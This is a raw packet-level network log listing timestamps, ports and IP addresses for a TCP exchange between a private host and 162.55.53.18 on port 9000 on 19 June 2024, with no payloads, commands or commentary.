Jun 19, 2024 14:40:17.654299974 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.654305935 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.654334068 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.654347897 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.654391050 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.654428959 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.654448032 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.654464006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.654485941 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.654495955 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.656940937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.656965017 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.656980991 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657011986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657018900 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657041073 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657068968 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657080889 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657097101 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657124996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657136917 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657151937 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657187939 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657202005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657232046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657258987 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657578945 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657651901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657666922 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657700062 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657721996 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657725096 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657742977 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657783031 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657830000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657846928 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657862902 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.657888889 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657901049 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.657942057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658036947 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658052921 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658077955 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658077955 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658092976 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658102989 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658128023 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658132076 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658173084 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658217907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658233881 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658257961 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658272028 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658296108 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658355951 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658396006 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658396006 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658416033 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658432961 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658449888 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658452034 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658468962 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658484936 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658492088 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658499002 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658525944 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658551931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658601046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658617020 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658638954 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658660889 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658673048 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658781052 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658801079 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658823967 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658826113 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658848047 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658869982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.658910990 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.658948898 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659298897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659348011 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659374952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659396887 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659421921 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659435034 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659485102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659502983 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659518957 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659535885 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659543991 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659568071 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659595966 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659625053 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659641981 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659657001 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659668922 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659672976 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659682989 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659692049 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659702063 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659712076 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659728050 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659732103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659775972 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659790993 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659816980 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659838915 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659895897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659912109 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659928083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659945011 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.659950018 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659970045 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.659996986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660164118 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660180092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660197020 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660202980 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660218000 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660233974 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660274029 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660290003 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660305977 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660331011 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660331964 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660356998 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660356998 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660376072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660379887 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660392046 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660393953 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660409927 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660410881 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660427094 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660446882 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660450935 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660470963 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660496950 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660505056 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660511017 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660528898 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660543919 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.660550117 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660566092 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.660578966 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.690273046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.690298080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.690314054 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.690448999 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.734793901 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.734935045 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.734998941 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.735207081 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.745042086 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745126009 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.745284081 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745342970 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.745362043 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745378017 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745428085 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.745460987 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745476007 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745491982 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745507002 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745528936 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.745580912 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.745693922 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745718002 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745733023 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745748043 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.745764017 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.745784044 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.748228073 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.748248100 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.748267889 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.748275042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.748297930 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.748310089 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.748311996 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.748327971 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.748342037 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.748366117 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.748387098 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749273062 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749289036 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749303102 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749316931 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749317884 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749326944 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749334097 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749346018 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749350071 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749360085 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749367952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749372959 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749385118 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749392986 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749403000 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749407053 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749427080 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749433994 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749586105 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749629021 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749650955 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749675035 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749717951 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749753952 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749769926 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749784946 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749800920 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749811888 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749826908 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749849081 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749872923 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749919891 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749934912 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749950886 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749960899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749965906 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.749980927 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.749989033 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750010014 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750157118 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750173092 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750188112 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750216007 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750235081 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750294924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750310898 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750325918 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750339985 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750341892 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750348091 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750359058 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750368118 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750376940 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750384092 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750392914 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750396013 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750410080 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750415087 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750427961 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750430107 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750447035 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750464916 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750730038 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750760078 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750772953 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750773907 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750791073 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750798941 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750807047 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750818014 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750822067 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750832081 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750840902 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750847101 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750857115 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750860929 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750874996 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750880003 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750891924 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750894070 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750907898 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750909090 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.750929117 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.750942945 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751209021 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751228094 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751252890 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751260042 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751274109 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751276016 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751291990 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751303911 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751306057 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751318932 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751322985 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751333952 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751338005 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751349926 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751354933 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751357079 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751372099 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751377106 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751389027 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751389027 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751405954 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751406908 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751420975 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751440048 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751823902 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751841068 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751854897 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751869917 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751876116 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751885891 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751902103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751914024 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751915932 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751921892 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751933098 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751946926 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751949072 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751956940 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751965046 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751975060 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751981020 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.751991034 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.751996994 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.752003908 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.752013922 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.752028942 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.752032042 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.752044916 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.752070904 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.780960083 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.780983925 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.780999899 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.781056881 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.781095982 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.835539103 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.835599899 CEST	49748	9000	192.168.2.4	162.55.53.18
Jun 19, 2024 14:40:17.835721970 CEST	9000	49748	162.55.53.18	192.168.2.4
Jun 19, 2024 14:40:17.835738897 CEST	9000	49748	162.55.53.18	192.168.2.4
